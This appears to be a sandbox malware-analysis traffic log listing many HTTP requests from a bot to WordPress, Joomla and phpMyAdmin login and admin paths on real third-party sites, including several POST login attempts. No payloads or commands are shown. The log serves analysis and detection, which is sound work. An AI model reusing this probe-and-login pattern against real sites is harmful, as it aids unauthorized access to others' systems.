Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; lander_type=forwarder; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://acidvision.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; lander_type=parkweb; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://blauthlaw.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: iisalessandrini.edu.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; lander_type=parking; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://att.com.au/wp-login.php
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://popular.de/wp-login.php
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /phpmyadmin/index.php?route=/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipCookie: phpMyAdmin_https=4i1sggv7vn9n89n6pl5o2h8dgn; pma_lang_https=enUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://fortressrealcapital.com/phpmyadmin/Content-Length: 148Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipCookie: PHPSESSID=i3lvqgq0ufurmkbj7l8g7oodcfvqs85sUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://eskimo.ch/administrator/
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: braekling.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; lander_type=parkweb; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://cfgteam.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: creativ-moebelwerkstaetten.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://m-viper.de/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://strategicimpact.com.au/wp-login.php
Source: global traffic	HTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: iisalessandrini.edu.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: waukesha-water.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: voltage-distribution.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /phpMyAdmin/index.php?route=/ HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipCookie: phpMyAdmin_https=g2a30bp049ecbdl879i2cnu3gr; pma_lang_https=enUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://amsantechnology.com/phpMyAdmin/Content-Length: 172Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.glazing-bt.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipCookie: PHPSESSID=oj6p6lfvhecu1oc8sf9095ke5tUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /phpmyadmin/index.php?route=/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipCookie: phpMyAdmin_https=01pke3gn684j248r213vdkd9te; pma_lang_https=enUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://fortressrealcapital.com/phpmyadmin/Content-Length: 148Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: braekling.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: cfca.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: markoren.noAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: voltage-distribution.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://fortressrealcapital.com/wp-login.phpContent-Length: 138Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: waukesha-water.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.eyegage.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: iisalessandrini.edu.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.creativ-moebelwerkstaetten.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.markoren.noAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP+Cookie+checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://norwegischlernen.info/wp-login.phpContent-Length: 137Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: m-viper.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin HTTP/1.1Host: iisalessandrini.edu.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://amsantechnology.com/wp-login.phpContent-Length: 136Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: glazing-bt.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: braekling.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: cfca.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://ksv-schwimmen.de/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: eskimo.chAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://eskimo.ch/wp-login.php
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://fortressrealcapital.com/wp-login.phpContent-Length: 164Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: eyegage.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
